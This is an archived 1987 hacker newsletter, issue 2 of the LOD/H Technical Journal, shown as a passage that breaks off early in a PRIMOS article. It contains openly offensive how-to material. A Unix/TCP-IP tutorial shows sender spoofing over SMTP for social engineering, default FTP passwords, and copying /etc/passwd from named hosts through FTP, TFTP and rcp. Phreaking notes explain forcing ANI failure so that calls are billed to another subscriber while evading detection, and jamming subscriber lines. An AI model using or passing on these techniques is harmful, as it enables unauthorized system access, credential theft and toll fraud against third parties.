home *** CD-ROM | disk | FTP | other *** search
/ LSD Docs / LSD Docs.iso / FILEZ / lsdph&ph.dms / lsdph&ph.adf / LOD-H.TJ#2.TXT.pp / LOD-H.TJ#2.TXT
Text File  |  1990-09-07  |  149KB  |  3,432 lines

  1.  
  2.  
  3. The LOD/H Technical Journal: File #1 of 10
  4. Volume 1, Issue 2  Released:  AUG. 10, 1987
  5.  
  6.  
  7.                                     THE
  8.  
  9.                            LOD/H TECHNICAL JOURNAL
  10.                            -----------------------
  11.  
  12.  
  13.                                INTRODUCTION:
  14.  
  15.  
  16.  
  17.      This is issue #2, we had originally planned to put out 6 issues a year,
  18. but it looks as if this will become a quarterly newsletter instead. This is due
  19. to the fact that the articles take months to fully research, write, and edit.
  20. By year end, we hope to show that we are not a "fly-by-night" newsletter and
  21. will continue to provide you with the same level of information, accuracy, and
  22. originality as this issue and the first. We appreciate those who have been
  23. downloading, storing, and distributing the newsletter in its entirety, and hope
  24. this will continue, as it benefits everyone.
  25.  
  26.  
  27.      Here is the breakdown of this issue: 1 article on Telecommunications,
  28. 4 articles on Datacommunications, and one article in the 'other' category. Two
  29. authors have written articles for Issue 1, and 5 are new. Obviously this Issue
  30. is more hacking related, whereas Issue 1 was more phreaking related. If you
  31. have any material which may be of interest, let us know.
  32.  
  33.  
  34.      Our 'sponsor' BBS list has been shortened to one dependable board, as
  35. Metal Shop Private, Shadowspawn, Hell Prozen Over, The Private Sector and
  36. Atlantis have all gone down, though some may be back online in the future. Left
  37. is Digital Logic. The usernumber/usernames for DL follows for those who wish to
  38. get in contact with us. We are open to suggestions for more Sponsor Boards.
  39.  
  40. Digital Logic: 305-395-6906 New User Pass=DIGIT
  41. LOD/H Technical Journal Staff Account Number is 231.
  42.  
  43. One last note, a slight clarification on articles. Articles labeled with
  44. letters, ie: Part A & Part B as in last issue's articles on the Outside Loop
  45. Distribution Plant by Phucked Agent 04 and the LOH Telenet Directory along with
  46. this issue's article on Hacking CMS by Lex Luthor are intended to be complete
  47. articles in themselves and should be merged together. They were broken up for
  48. editing and transmission purposes. Articles labeled as Part 1 & Part 2, are
  49. separate articles based on the same subject.
  50.  
  51. -------------------------------------------------------------------------------
  52.  
  53.                   TABLE OF CONTENTS:
  54.  
  55. 01 Introduction to the LOD/H Technical Journal          Staff             04 K
  56.    and Table Of Contents for Volume 1, Issue 2
  57.  
  58. 02 The Networked Unix                                   Solid State       17 K
  59.  
  60. 03 Step By Step (SXS) Switching System Notes            Phantom Phreaker  12 K
  61.  
  62. 04 A Guide to the PRIMOS Operating System               Carrier Culprit   25 K
  63.  
  64. 05 Identifying and Defeating Physical Security and      Lex Luthor        30 K
  65.    Intrusion Detection Systems Part II: The Exterior
  66.  
  67. 06 A Discrete Unix Password Hacker                      Shooting Shark    09 K
  68.  
  69. 07 Hacking DEC's TOPS-20:  Part II                      Blue Archer       25 K
  70.  
  71. 08 Hacking IBM's VM/CMS Operating System, Part A.       Lex Luthor        26 K
  72.  
  73. 09 Hacking IBM's VM/CMS Operating System, Part B.       Lex Luthor        25 K
  74.  
  75. 10 Network News & Notes                                 Staff             07 K
  76.  
  77. Total: 7 articles, 10 files  180 K
  78.  
  79. -------------------------------------------------------------------------------
  80.  
  81.  
  82.  
  83. The LOD/H Technical Journal: File #2 of 10
  84.  
  85.  
  86. ----------------------------
  87.      The Networked UNIX
  88.           :TCP-IP
  89.   by:
  90.         SOLID STATE
  91.         June 23 1987
  92. ----------------------------
  93.  
  94. PREFACE
  95.  
  96.    I've written this article with the assumption that those reading it have a
  97. working knowledge of UNIX and large networks, specifically the DARPA Internet
  98. -- ARPAnet and MILnet. Within I offer guidance on features of the TCP-IP
  99. (Internet Transmission Control Protocol) architecture, such as FTP, TFTP,
  100. TELNET, SMTP, and the UNIX Remote Execution Facilities. Before I commence, I
  101. want to make it known that this file is not intended to be a 'why' file, but
  102. instead a 'how to' tutorial. In the event I get a good response concerning
  103. this document, I may later release a more technical oriented paper from a
  104. programmer's viewpoint.
  105.  
  106.    NOTE: Instances where I give examples of a command format, words in capital
  107. represent variables. For example, in the line '$ telnet HOST', HOST should be
  108. replaced (in LOWERCASE!) by the name of a system. This is just my means of
  109. distinguishing between actual commands and their options.
  110.    Control characters are denoted in the form of an exponent, eg. ^H is
  111. control H.
  112.  
  113. YP DATABASE
  114.  
  115.    Present on every UNIX that supports TCP-IP are a set of files labeled by
  116. programmers as the yellow pages, that serve as a directory of the hosts and
  117. networks accessible by your system. These files are /etc/hosts and
  118. /etc/networks respectively. There may also be a third, /etc/hosts.equiv which
  119. is a listing of those hosts that share resources and/or have users common to
  120. each other. They are ASCII text and have viewable permissions to all.
  121. Therefore it may prove helpful to print these out for reference and easy
  122. access. Entries in the above mentioned take the form:
  123.  
  124. ###.###.###.###     host.owner.research   nicknames
  125.  
  126. Example:
  127.  
  128. 18.72.0.39          athena.mit.edu   mit-athena athena
  129.  
  130.    The string of numbers, expressed in octal "dot notation", is the NetNumber
  131. of the host. Followed by the complete name, and lastly other names which it is
  132. universally known as. When attempting to access a system, any one of these
  133. identification codes may be used.
  134.    NOTE: Most of the databases one will come across are incomplete or may be
  135. outdated. A complete host list can be obtained from the Network Information
  136. Control Center (NIC) at SRI International, the host name is sri-nic.arpa
  137.  
  138. TELNET
  139.  
  140.    Telnet is the standard facility used for logging into other systems. It is
  141. found not only on UNIX, but TOPS, VMS, and all the other various operating
  142. systems found on the DDN. To activate the program:
  143.  
  144. % telnet HOST [PORT]
  145.  
  146.    If invoked without arguments, it enters command mode, indicated by the
  147. prompt 'telnet>' From here, many functions are available.
  148.  
  149. open HOST [PORT]
  150.    Open connection to named computer. If PORT, which shall be explained
  151. subsequently, is ommitted then telnet will contact the TELNET server of that
  152. host. As earlier mentioned, systems can be addressed by either their
  153. NetNumber, NetName, or a nickname.
  154.  
  155. close
  156.    Close connection and return to command mode.
  157.  
  158. quit
  159.    End session and exit program.
  160.  
  161. status
  162.    Show current status of telnet. ie. connections and toggled options.
  163.  
  164. z
  165.    Suspend telnet. This allows you to operate an interactive shell on the
  166. local machine while pending an open connection to a remote host.
  167.  
  168. ? COMMAND
  169.    Get help on COMMAND. Or if COMMAND is ommitted, then a summary of all
  170. options is printed.
  171.  
  172.    Once a connection has been established, telnet enters input mode where you
  173. can communicate directly with the remote. To return to command mode, enter ^]
  174. A hacking session might look like:
  175.  
  176. % telnet ucbvax.berkeley.edu
  177. Trying 10.2.0.78 ...
  178. Connected to ucbvax.berkeley.edu.
  179. Escape character is '^]'.
  180.  
  181. 4.3 BSD UNIX (ucbvax.Berkeley.EDU)
  182.  
  183. login: example
  184. Password: ^D
  185. Connection closed by foreign host.
  186. %
  187.  
  188. PORTS
  189.  
  190.    Each host on the Internet runs various daemons to perform tedious upkeep
  191. jobs like recording logs, mounting disks and on UNIX, cleaning uucp and /tmp
  192. files. Along with the 'normal' daemons is one ran to accomodate communication
  193. between a host and its peers on a network. inetd the managing daemon of system
  194. to system communication has a number of various services which it regularly
  195. uses, but they can also be manually addressed via telnet. The notation,
  196. predisplayed, is simply:
  197.  
  198. % telnet HOST PORT
  199.  
  200. OR
  201.  
  202. telnet> open HOST PORT
  203.  
  204.    Now each service has a port number associated with it. The number is
  205. decimal, in the range 0-1023. A database of all active services is located in
  206. the ASCII text file /etc/services
  207.    From a hacker's view the following are very helpful in the process of
  208. penetrating a system:
  209.  
  210. 79        Finger server. Connecting to this will give a systat report similar
  211. to one a user would get if he was on the target system and issued the finger
  212. command. Once connected to port 79, the host will sit idle until one of two
  213. things: Either a return is pressed and a general finger will result, or a
  214. username is entered where personal info will outcome.
  215.  
  216. % telnet psuvax1.psu.edu 79
  217. Trying 128.118.6.2 ...
  218. Connected to psuvax1.psu.edu.
  219. Escape character is '^]'.
  220.  
  221. Login       Name              TTY Idle    When            Office
  222. opr      The Operator          co      Sat 19:02  334  Whitmo  x5-9723
  223. hager    William W. Hager      d1      Sat 18:50              237-8876
  224. georg    Georg Schnitger       22 1:32 Sat 18:42  315  Whitmo  x5-1406
  225. malik    Sohail Malik          p0  18  Sat 19:16  214c  Compu  x5-0816
  226. Connection closed by foreign host.
  227. %
  228.  
  229. 11        Systat server. This can not be issued to target UNIX systems, but is
  230. applicable to VMS and TOPS where it returns data like that from finger.
  231.  
  232. 25        SMTP server. This is the server used for mail among systems. It is
  233. also the most vulnerable port to attack as it can be easily fooled. With this
  234. knowledge the hacker can assume any identity he wishes through mail. For
  235. example, to send mail to guest@cc3.bbn.com from root@satnet.arpa, under normal
  236. circumstances one would have to possess the root account wherefrom he would
  237. just enter:
  238.  
  239. % mail guest@cc3.bbn.com
  240.  
  241.    But this is not always feasible or possible! So we must resort to an
  242. indirect, devious approach..
  243.  
  244. % telnet cc3.bbn.com 25
  245. Trying 8.3.0.5 ...
  246. Connected to cc3.bbn.com.
  247. Escape character is '^]'.
  248.  
  249. 220 cc3.bbn.com. Sendmail 3.2/SMI-3.2 ready at Fri, 28 Feb 87 17:40:53 PST
  250.  
  251. rcpt to: guest
  252. 250 guest... Recipient ok
  253. mail from: root@satnet.arpa
  254. 250 example... Sender ok
  255. data
  256. 354 Enter mail, end with "." on a line by itself
  257.  
  258. This is an example of the SMTP port.
  259. .
  260. 250 Mail accepted
  261. ^]
  262. telnet> c
  263. Connection closed.
  264. %
  265.  
  266.    To summarize the text above; First, contact the remote at port 25 using
  267. telnet:
  268.  
  269. % telnet HOST 25
  270.  
  271.    After system link authentication, enter:
  272.  
  273. rcpt to: USERNAME
  274.  
  275.    Ok? Type in bogus identity:
  276.  
  277. mail from: USERNAME@HOST
  278.  
  279.    To start message:
  280.  
  281. data
  282.  
  283.    Now, the mail:
  284.  
  285.      My organization has of late been discussing an upgrade to a Vax
  286. processor. The Sun computer we are currently using is immensely slow (and
  287. getting slower!) due to the demands put on it by the users. If you would allow
  288. me a demo account on your system so I may view its performance, I would be
  289. deeply grateful.
  290.      Please respond to me through mail at: bogus!haha!sys1!jeff.
  291.  
  292.    A period on a line by itself will complete the transfer:
  293.  
  294. .
  295.  
  296. FTP
  297.  
  298.    FTP is a file transfer program that is quite powerful and helpful to the
  299. hacker in obtaining access to a target. It can be used to send and receive
  300. data. Similar to telnet, the client with which to communicate can be
  301. specified when invoked:
  302.  
  303. % ftp -n HOST
  304.  
  305.    The -n option I always include as it disables auto-login and net-trace, an
  306. auto-feature which sends the originator's login and system name. The prompt
  307. for FTP is 'ftp>'.
  308.  
  309. open HOST
  310.    Establish connection to the named HOST.
  311.  
  312. close
  313.    Terminate connection and return to command interpreter.
  314.  
  315. quit
  316.    Abort program.
  317.  
  318. status
  319.    Show status parameters.
  320.  
  321. ! COMMAND
  322.    Run shell command on local machine. Like the 'z' option of telnet, if
  323. COMMAND is ommitted, than an interactive shell is invoked. ^D will return user
  324. back to the interpreter.
  325.  
  326. ls
  327.    Print a listing of the directory contents on the remote host in an
  328. abbreviated form. To do a long listing, enter 'dir'.
  329.  
  330. cd REMOTE_DIRECTORY
  331.    Change the working directory on server.
  332.  
  333. pwd
  334.    Print working directory on remote.
  335.  
  336. lcd DIRECTORY
  337.    Change the working directory on the local machine to DIRECTORY.
  338.  
  339. get REMOTE_FILE LOCAL_FILE
  340.    Receive the REMOTE_FILE on the remote system and name it LOCAL_FILE on the
  341. local system.
  342.  
  343. send LOCAL_FILE REMOTE_FILE
  344.    Send LOCAL_FILE to the host and name it REMOTE_FILE.
  345.  
  346. append LOCAL_FILE REMOTE_FILE
  347.    Append LOCAL_FILE to the end of the distant file, REMOTE_FILE.
  348.  
  349. rename REMOTE_FILE NEW_REMOTE_FILE
  350.    Give a new name to a remote file.
  351.  
  352. delete REMOTE_FILE
  353.    Kill REMOTE_FILE.
  354.  
  355.    Various other commands exist for bulk transfers and directory management.
  356. If there is any doubt ever on a command, help is always available:
  357.  
  358. ftp> help COMMAND
  359.  
  360.    Once a connection has been made, the computer will identify itself and then
  361. go idle. (That is, if auto-logging is disabled as it should be.) To login to
  362. the system:
  363.  
  364. ftp> user USERNAME
  365.  
  366.    Then if a pass is required, the proper prompt will appear.
  367.  
  368. % ftp -n
  369. ftp> o ll-xn.arpa
  370. Connected to LL-XN.ARPA.
  371. 220 ll-xn FTP server (Version 4.103 Wed Jun 25 17:42:33 EDT 1986) ready.
  372. ftp> user anonymous
  373. 331 Guest login ok, send ident as password.
  374. Password:
  375. 230 Guest login ok, access restrictions apply.
  376. ftp>
  377.  
  378.    Logging on to a FTP server is different than normally entering a machine.
  379. When a remote user is operating FTP, the exchange is treated as a process of
  380. ftp or daemon, not an actual login. Therefore, a different login program,
  381. which restricts use immensely, is used.
  382.    If set up properly, FTP will chroot to /usr/spool/ftp where three
  383. directories exist, bin, etc, and pub. Within /usr/spool/ftp/etc is the
  384. password file used for the FTP server login program. It is not a complete
  385. version of that in /etc/passwd, but it can be useful by providing usenames.
  386.    Also of mentioning is /etc/ftpusers. This file contains multiple lines
  387. of usernames is like /usr/lib/cron/cron.deny on a Unix System V. If you are
  388. unlucky and your username appears in the file, FTP logins are denied.
  389.    A few defaults are present within this doctored version of /etc/passwd that
  390. most always will provide access to a system.
  391.  
  392. ACCOUNT                  PASSWORD
  393. =================================
  394. anonymous                anonymous, guest, ftp
  395. ftp                      ftp
  396. guest                    guest
  397. ftpser                   ftpser
  398. tftpser                  tftpser
  399. help                     help
  400.  
  401.    Each user may have in their home directory a file titled '.netrc'. This is
  402. a file containing usernames and passwords used on systems that a user commonly
  403. converses with. Entries in the file take the form:
  404.  
  405. machine HOST login USERNAME password PASSWORD
  406.  
  407.    It is advantageous to locate all of these files on your system as they will
  408. expand not only your systems list, but also your chance of entering a
  409. computer.
  410.    Once admittance has been gained, I suggest copying the /etc/passwd file for
  411. later attempts at hacking the front end of the system if other routes such as
  412. defaults, finger, TFTP (To be explained hereafter.), or by way of the remote
  413. facilities (Ditto.) are not possible.
  414.  
  415. ftp> get /etc/passwd pass
  416. 200 PORT command okay.
  417. 150 Opening data connection for /etc/passwd (26.8.0.14,1389) (47 bytes).
  418. 226 Transfer complete.
  419. 48 bytes received in 0.32 seconds (0.15 Kbytes/s)
  420. ftp> close
  421. 221 Goodbye.
  422. ftp> quit
  423. %
  424.  
  425.  
  426. TFTP
  427.  
  428.    The Trivial File Transfer Program is probably the most dangerous aspect of
  429. the TCP-IP structure on the Internet. TFTP requires no account or password be
  430. present on a host system. About the only restriction is that the files
  431. inquired must have public read access permissions set. If not, an
  432. authorization failure error will result. Also, the TFTP server port must be
  433. open, otherwise no transmissions can take place.
  434.  
  435. % tftp HOST
  436.  
  437.    Once connected, the user will get the 'tftp>' prompt where from he can grab
  438. or send files.
  439.  
  440. connect HOST
  441.    Set HOST up for transfers. There is no actual connection made in the sense
  442. that communication has happened, the program merely remembers what host to be
  443. used in a transfer inquiry. Therefore, there is not a disconnect command.
  444.  
  445. quit
  446.    Exit TFTP.
  447.  
  448. status
  449.    Show current set parameters. ie. HOST and timeout period.
  450.  
  451. get /PATH/FILE /PATH/FILE
  452.    Get /PATH/FILE from HOST and name it /PATH/FILE on local system. If no HOST
  453. has been specified yet, the form may be 'get HOST:/PATH/FILE /PATH/FILE'.
  454.  
  455. put /PATH/FILE /PATH/FILE
  456.    Send /PATH/FILE on local system to HOST and give it the title /PATH/FILE.
  457. As above, if HOST has not been specified, the form is 'put /PATH/FILE
  458. HOST:/PATH/FILE'.
  459.  
  460. timeout SECONDS
  461.    Set timeout parameter. The default is 25, that means abort transmission if
  462. no response from selected host after set period.
  463.  
  464. ? COMMAND
  465.    Help with TFTP.
  466.  
  467.    TFTP is the preferred method of file transfer. But is often closed to use
  468. due to its insecurities. To the hacker though, it is wonderful because data
  469. captured are genuine, not doctored versions as is the case with FTP. Therefore
  470. if possible, one will most likely use it to copy /etc/passwd:
  471.  
  472. % tftp mit-amt
  473. tftp> get /etc/passwd /tmp/passwd
  474. Received 16453 bytes in 7 seconds.
  475. tftp> q
  476. %
  477.  
  478. REMOTE PROCEDURES
  479.  
  480.    Additional to the standard features of the TCP setup present on all
  481. machines of the net, UNIX has a set of it's own remote system interaction
  482. commands. The set of utilities, which I affectionately call the Remote
  483. Execution Facilities, are usable only between resource sharing UNIX systems.
  484. The conglomeration of remote programs can be very helpful for overtaking other
  485. suspect targets, especially if they are part of a small network unto
  486. themselves besides being major hosts on the Internet.
  487.    Before one sets out on the quest of conquering a system, it is wise to know
  488. who is currently logged on:
  489.  
  490. % rusers -l HOST
  491.  
  492.    Rusers -l alone will print out a listing for all immediate surrounding UNIX
  493. hosts, but if a HOST is specified, only that particular computer will report.
  494.  
  495. % rlogin HOST -l USERNAME
  496.  
  497.    If -l USERNAME is not included, the account name in use at present time
  498. will be used as the USERNAME when attempting login to HOST. If the username
  499. specified is present locally and on the distant machine in the file
  500. /etc/hosts.equiv, no password is required to login. This can be compromising
  501. to the security, a reason why the security wise will often make
  502. /etc/hosts.equiv a null file.
  503.    Each user may optionally have a file, '.rhost', in his home directory. This
  504. is a personal equivalent to /etc/hosts.equiv. If you are logged into an
  505. account with such a file, no pass is required to login (via rlogin), to the
  506. computers named.
  507.    Alike to the UUCP protocol, there is an allowance of the Remote Execution
  508. Facilities to preform commands on a networked system:
  509.  
  510. % rsh HOST -l USERNAME "COMMAND"
  511.  
  512.    Remote shell will permit unlimited commands to be carried out on the remote
  513. as long as the following criteria is met:
  514.      The username, if specified (If it is not, the current local one is
  515. used.), must be present on the foreign system and have remote execution
  516. privileges.
  517.      Commands are effective according to the environment set in .cshrc and
  518. .login on the host.
  519.    An example job:
  520.  
  521. % rsh century "ps -t console"
  522.  
  523.    If the quotes are ommitted then variables like *?.,X are taken literally.
  524. Also, if no redirection is submitted, than output, if the command yields it,
  525. is sent back to the issuee.
  526.    Remote Copy, a sub-command of rsh, is a command similar to uucp. It must
  527. follow the criteria of Remote Shell plus all files qued must have public read
  528. permissions.
  529.  
  530. % rcp HOST:/PATH/FILE HOST:/PATH/FILE
  531.  
  532.    For example, a common call would be the password file. So if I wanted to
  533. transfer the /etc/passwd file from harvard.arpa to rutgers:
  534.  
  535. % rcp harvard.arpa:/etc/passwd rutgers:/tmp/passwd
  536.  
  537.    This format leaves quite alot of flexibility as it stands third party
  538. transfers are possible. If the second HOST is not inserted, than the file is
  539. put on the local system.
  540.    A notable option of rcp is directory copy. It will if specified, copy a
  541. directory and all the trees beneath it...allowing you to in theory to copy the
  542. entire file system onto your local host. (uh, oh!)
  543.  
  544. % rcp -d HOST:/PATH/DIRECTORY_NAME HOST:/PATH/DIRECTORY_NAME
  545.  
  546. CONCLUSION
  547.  
  548.    In closing I would like to state that I have purposely left much
  549. information uncovered if I felt it would compromise an institution or company.
  550. I apoligize for not explaining many of the subjects discussed in the full
  551. detail they deserve, but if I had this article would have been mammoth.
  552.    Any questions, challenges, comments, or criticism can be directed to me,
  553. Solid State, through any of a various boards I visit or to an LOD/H Technical
  554. Journal account of which your mail shall be somehow communicated to me.
  555. Sys Unix Comm
  556.  
  557. The LOD/H technical Journal: File #3 of 10
  558.  
  559.  
  560.                          STEP BY STEP SWITCHING NOTES
  561.  
  562.                               BY PHANTOM PHREAKER
  563.  
  564.                       WRITTEN FOR LOD/H TECHNICAL JOURNAL
  565.  
  566.  
  567.     The following research was done on a class 5 Step By Step switching system.
  568. Items mentioned in this article are not guaranteed to work with your particular
  569. office.  The following interesting topics about Step By Step switching are for
  570. informational and educational purposes only. This article is aimed at people
  571. who wish to learn more about telephone switching systems.
  572.  
  573.     I realize step-by-step switching is dwindling every day, with many
  574. electromechanical SxS offices being replaced with newer electronic/digital
  575. switches and Remote Switching Systems (RSS's). However, rural areas of the U.S.
  576. still use Step, so if you are ever in an area served by a SxS CO you may be
  577. able to use this information.
  578.  
  579.  
  580.     1:ANI Failure/ONI
  581.  
  582.     To understand this technique, you must understand how ANI functions in the
  583. Step-by-Step switching system. Your CO sends ANI, with your number, in MF or DP
  584. to recievers that collect the ANI information and store it, along with the
  585. called number, on the appropriate form of AMA tape. ANI outpulsing in MF can
  586. use either LAMA (Local Automatic Message Accounting) or CAMA (Centralized
  587. Automatic Message Accounting). ANI sent in DP type signalling can also be used,
  588. but is rare. DP vs MF trunk signalling is similar to the difference between
  589. DTMF and pulse dialing, except on a trunk. DP signalling sends all information
  590. in short bursts of 2600Hz tones.
  591.  
  592.     Causing ANIF's/ONI is an easy task in SxS (and some versions of Xbar),
  593. because the customer's link to the CO will allow the customer to input MF tones
  594. to influence a calls completion. This can be done by dialing a long distance
  595. number and listening to the clicks that follow. After the first click when you
  596. are done dialing, you will hear a few more. They will be timed very close to
  597. one another, and the last click occurs right before the called telephone rings.
  598. The number and speed of the clicks probably varies. Basically what these clicks
  599. are is the Toll Office that serves your CO setting up a route for your call. In
  600. order to abuse this knowledge, you need access to a MF source, whether it be a
  601. blue box, a computer with a good sound chip, tape recording, etc. Right before
  602. you hear the series of clicks, send one of the following sequences in MF:
  603.  
  604. KP+1 (Repeatedly) For Automatic Number Identification Failure (ANIF)
  605.  
  606. -or-
  607.  
  608. KP+2 (Repeatedly) For Operator Number Identification (ONI)
  609.  
  610. (Note:these will not work if your CO uses DP signalling.)
  611.  
  612. Play these tones into the phone at a sufficient volume so that they 'drown out'
  613. the series of clicks. Do not send an ST signal, as you are not actually dialing
  614. on a trunk. You must send these MF sequences quickly for this method to work
  615. correctly. After you have played your 'routing' a few times, you will hear a
  616. TSPS operator intercept your call and ask for the number you are calling FROM.
  617. When an ANIF is recognized, the call is cut through to a TSPS site that serves
  618. your area. Now, you can give the operator any number in your exchange and she
  619. will enter the billing information manually, and put the call through. The toll
  620. charges will appear on the customer who owns the number you gave. You can also
  621. accomplish a similar feat by merely flashing the switchook during the series of
  622. clicks. This will send DC pulses that scramble the ANI outpulsing and cause
  623. your call to be sent to a TSPS operator before the dialed number. Be sure to
  624. stop sending the MF 'routing' after the operator attaches or she may know that
  625. something's up. Use this method sparingly and with caution. It would also be a
  626. good idea not to use the same number for billing more than one time. Don't use
  627. this method in excess, because a toll office report will list the number of ANI
  628. failures for a specific time period. The ONI method works better because it is
  629. assumed ONI is needed to identify a caller's DN upon a multi-party line. Too
  630. many ANI failures will generate a report upon a security/maintenance TTY, so if
  631. you plan on using this method, use the ONI method instead of just ANI Failure.
  632. The basic idea behind the ANIF is to scrramble your ANI information by using MF
  633. (or the switchhook) to send your LD call to a TSPS operator for Operator Number
  634. Identification (ONI) due to ANI Failure. The idea behind the ONI method is that
  635. you are fooling the switch into thinking you are calling from a multi-party
  636. line and ONI is needed to identify your DN.
  637.  
  638.  
  639.     2:Test numbers
  640.  
  641.     Some other interesting things in the Step By Step system can be found by
  642. dialing test numbers. Test numbers in SxS switching systems are usually hidden
  643. in the XX99 area, as opposed to 99XX, which is common for other types of
  644. switching systems. These types of numbers are possibly physical limitations of
  645. a SxS switch, and thus a milliwatt tone or other test numbers will be placed
  646. there, because a normal DN can't be assigned such a number. However, these XX99
  647. numbers are usually listed in COSMOS as test numbers. Another interesting note
  648. about XX99 numbers is that they seem (at least in some offices) to be on the
  649. same circuit. (That is, if one person calls an XX99 number and recieves a test
  650. tone, and another person calls any other XX99 number in that same prefix, the
  651. second caller will recieve a busy signal).
  652.  
  653.     Here we must examine the last four digits of a telephone number in detail.
  654.  
  655.  
  656. XXXX=WXYZ             W=Thousands digit
  657.                       X=Hundreds digit
  658.                       Y=Tens digit
  659.                       Z=Units digit
  660.  
  661.  
  662.     Dialing your prefix followed by an XX99 may result in a busy signal test
  663. number, a network overflow (reorder), miilliwatt tones, or other type of error
  664. messages encountered when dialing.
  665.  
  666.     Not every XX99 number is a test number, but many are. Try looking for these
  667. in a known Step by Step office.
  668.  
  669.     The numbers that return a busy signal are the ones that incoming callers
  670. are connected to when the Sleeve lead of the called Directory Number is in a
  671. voltage present state, which means the line is in use or off-hook. More about
  672. this in the next topic.
  673.  
  674.  
  675.     3:Busy signal confrencing
  676.  
  677.     Another interesting feature of the Step-By-Step system is the way busy
  678. tones (60 IPM) are generated. In ESS and DMS central offices, busy signals that
  679. are sent by the terminating switch are computer generated and sound very even
  680. and clear with no signal irregularity. In SxS, all calls to a particular DN are
  681. sent to the same busy signal termination number, which can be reached most of
  682. the time by a POTS number. These busy tones are not computer generated and the
  683. voice path is not cut-off.
  684.  
  685.     You can take advantage of this and possibly have a 'busy signal confrence'.
  686. This can be achieved by having several people dial the same busy DN that is
  687. served by a Step office, or by dialing an always-busy termination number. When
  688. you are connected to the busy signal, you will also be able to hear anyone else
  689. who has dialed the same busy number. Connection quality is very poor however,
  690. so this is not a good way to communicate.
  691.     As an added bonus, answering supervision is not returned on busy numbers,
  692. and thus the call will be toll-free for all parties involved. However, you must
  693. be using AT&T as your inter-LATA carrier if the call to the busy number is an
  694. inter-LATA call for you. So if your IC is US Sprint, you must first dial the
  695. AT&T Carrier Access Code (10ATT) before the busy number. If your IC doesn't
  696. detect answer supervision, and begins billing immediately or after a certain
  697. amount of time, then you will be billed for the length of the call.
  698.  
  699.  
  700.     4:Temporarily 'freezing' a line
  701.  
  702.     A SxS switching system that operates on the direct control principle is
  703. controlled directly by what the subscriber dials. Jamming a line on SxS to
  704. prevent service is possible by simply flashing the switchook a number of times.
  705. Or you may find after serveral aborted dialing attempts, the line will freeze
  706. until it is reset, either manually or by some time-out mechanism. Usually the
  707. time the line is out of action is only a few minutes. The line will return a
  708. busy signal to all callers, and the subscriber who has a 'dead' phone will not
  709. even hear sidetone. This happens when one of the elements in the switch train
  710. gets jammed. The switch train consists of the linefinder, which sends a dial
  711. tone to the subscriber who lifted his telephone, and places voltage on the S
  712. (Sleeve) lead as to mark that given DN as busy. Next in the switch train are
  713. the selectors. The selectors are what recieve the digits you dial and move
  714. accordingly. The last step in the switch train is the connector. The connector
  715. is what connects calls that are intraoffie, and sends calls to a Toll office
  716. when necessary. Other types of devices can be used in the switch train, such as
  717. Digit Absorbing Selectors, where needed.
  718.  
  719.     5:Toll/Operator assisted dialing
  720.  
  721.     You may be able to dial 1/0+ numbers with your prefix included in some
  722. areas. You can dial any call that you could normally reach by dialing 1+ or 0+.
  723. For example, to dial an operator-assisted call to a number in Chicago, you
  724. could dial NXX+0312+555+1000 where NXX is your prefix, and you would recieve
  725. the usual TSPS bong tone, and the number you dialed, 312+555+1000, would show
  726. up on the TSPS consoles LED readout board. You can also use a 1 in place of the
  727. 0 in the above example to put the call through as a normal toll call.
  728.  
  729.     This method does not bypass any type of billing, so don't get your hopes
  730. up high.
  731.  
  732.     The reason this works is twofold. The first reason is that the thousandths
  733. digit in many SxS offices determines the type of call. A 0 or a 1 in place of
  734. another number (which would represent a local call) is handled accordingly. The
  735. other reason is due to a Digit Absorbing Selector that can be installed in some
  736. SxS offices to 'absorb' the prefix on intraoffice calls when it is not needed
  737. to process the call. A DAS can absorb either two or three digits, depending
  738. on whether the CO needs any prefix digit(s) for intraoffice call completion.
  739.  
  740.     6:Hunting prefixes
  741.  
  742.     SxS switches may also translate an improperly dialed local call and send
  743. it to the right area over interoffice trunks. Take for instance, you need to
  744. make a local call to 492-1000. You could dial 292-1000 and reach the exact
  745. same number, provided that there is no 292 prefix within your local calling
  746. area. However, only the first digit of a prefix may be modified or the call
  747. will not go through correctly unless you happen to have dialed a valid local
  748. prefix. You also cannot use a 1 or a 0 in place of the first prefix digit,
  749. because the switch would interpet that as either dialing a toll or an operator
  750. assisted call.
  751.  
  752.  
  753.     7:Trunks
  754.  
  755.     Step by Step switching system incoming and outgoing trunks are very likely
  756. to use In-band supervisory signalling. This means you could possibly use
  757. numbers served by a SxS CO to blue box off of. But, some older step areas may
  758. not use MF signalling, but DP signalling. DP signalling uses short bursts of
  759. 2600Hz to transfer information as opposed to Multi-Frequency tones. In DP
  760. signalling, there are no KP or ST equivalents. Boxing may be accomplished from
  761. DP trunks by sending short bursts of 2600Hz (2 bursts would be the digit 2).
  762. Acceptablepulse rates are 7.5 to 12 pulses per second, but the normal rate is
  763. 10 pulsesper second. A pulse consists of an 'on hook' (2600Hz) tone and an
  764. off-hook (no tone). So, at 10 pulses per second, a digit might be .04 seconds
  765. of tone and .06 seconds of silence. DP is rarely used today, but some
  766. direct-control Step offices still use it. Common Control Step offices are much
  767. more likely to use MF trunk signalling.
  768.  
  769.  
  770.     As said at the start of this file, some of the things mentioned here may
  771. have no practical use, but are being exposed to the public and to those who did
  772. not know about any one of the procedures mentioned here previously.
  773.  
  774.  
  775.                         References and acknowledgements
  776. ===============================================================================
  777.      Basic Telephone Switching Systems-By David Talley, Hayden publishers
  778.                No. 1 AMARC-Bell System Technical Journal
  779.   Mark Tabas for information about CAMA and DP, The Marauder, and Doom Prophet.
  780. ===============================================================================
  781.  
  782.  
  783. The LOD/H Technical Journal: File #4 of 10
  784.  
  785.  
  786.        A Guide to the PRIMOS Operating System
  787.  
  788.                      Written by,
  789.                    Carrier Culprit
  790.                          and
  791.                 The Legion Of Hackers
  792.  
  793.   This is Part I of a II part series on the PRIME
  794.   operating system.  In this article I will give a
  795.   general overview of the system and command usage.
  796.  
  797.  
  798.  Note: This article will center around the Primos version 19, and revisons 19.1
  799. and up.
  800.  
  801.  
  802. [Backround Information]
  803.  
  804.   Primos is the operating system for the PRIME mainframe, and supermini
  805. systems.  The operating system is usually run on the Prime 750.  Primos is a
  806. relatively secure system. Externally security is great, but the internal
  807. security needs help.  The latest revision of version 19 is 19.4.0 (as of this
  808. writing). This revision is more secure in both external and internal security
  809. than its predecessors. By the time this article is released, Version 20 should
  810. be out and an article on that version will be forthcoming.
  811.  
  812.  
  813. [Logging in V18.x.x]
  814.  
  815.   It is quite easy to hack into a Prime running a version 18 of Primos.
  816. The external security is rather poor.  All you need is an ID to logon.
  817. There is no password prompt, thus getting an operator's account is
  818. rather easy. Occasionlly, there will be some additional security software
